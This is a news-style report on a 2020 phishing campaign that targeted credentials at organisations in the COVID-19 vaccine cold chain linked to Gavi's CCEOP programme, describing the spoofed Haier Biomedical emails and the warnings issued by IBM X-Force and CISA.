COVID-19 Vaccine Supply Chain Victim of Global Phishing Campaign
As the world continues to be subject to the COVID-19 pandemic, and as we grow closer and closer to a vaccine, a sophisticated, global phishing campaign has been targeting the credentials of organizations associated with the COVID-19 “cold-chain.” These are companies that ensure the safe preservation of vaccines by making sure that they are stored and transported in temperature-controlled environments.
Starting in September of 2020, the phishing campaign has spanned across five countries, targeting organizations associated with a public–private global health partnership, called Gavi, the Vaccine Alliance, with goals to leverage such cold-chain companies in order to safely transport the COVID-19 vaccine to underdeveloped regions.
Both researchers with the IBM Security X-Force, and the Cybersecurity infrastructure Security Agency (CISA), released posts warning of the attack. They claim that the purpose of the campaign is to harvest email or network credentials in order to gain unauthorized access across targeted organizations. While there has been no concrete evidence to point towards any one group as the threat actors behind this attack, it is important to note that the precise targeting of key global organizations point towards potential nation-state activity.
Researchers said that attackers targeted multiple industries, governments and global partners that support a program launched by Gavi, The Vaccine Alliance in 2015. The program, called the Cold Chain Equipment Optimization Platform (CCEOP), aims to strengthen vaccine supply chains, improve worldwide immunization equity and bolster medical response to disease outbreaks. With the ongoing pandemic the program is accelerating its efforts to facilitate the distribution of the COVID-19 vaccine.
The attack consists of phishing emails purporting to come from a business executive from Haier Biomedical, with the attacker using a spoofed domain, haierbiomedical[.]com (Haier Biomedical’s legitimate domain is haiermedical.com.) Haier is a Chinese company that’s currently a qualified supplier for the CCEOP program, signaling that attackers have done their homework and are sending highly targeted emails. The email’s subject posed as requests for quotations (RFQ) related to the CCEOP program, with the subject of the email is “RFQ – UNICEF CCEOP and Vaccine Project.”
The email contained malicious HTML attachments, which once opened, prompted recipients to enter their credentials to view the file.
Should cybercriminals manage to steal these credentials, it would have dangerous implications. Threat actors could use the credentials to gain insight into internal communications, as well as the background processes, methods and plans for COVID-19 vaccine distribution – including sensitive government information about the infrastructure used to distribute the vaccine. Attackers could also utilize the credentials to extend deeper into victim environments, researchers warned – allowing them to conduct further espionage.
Sources: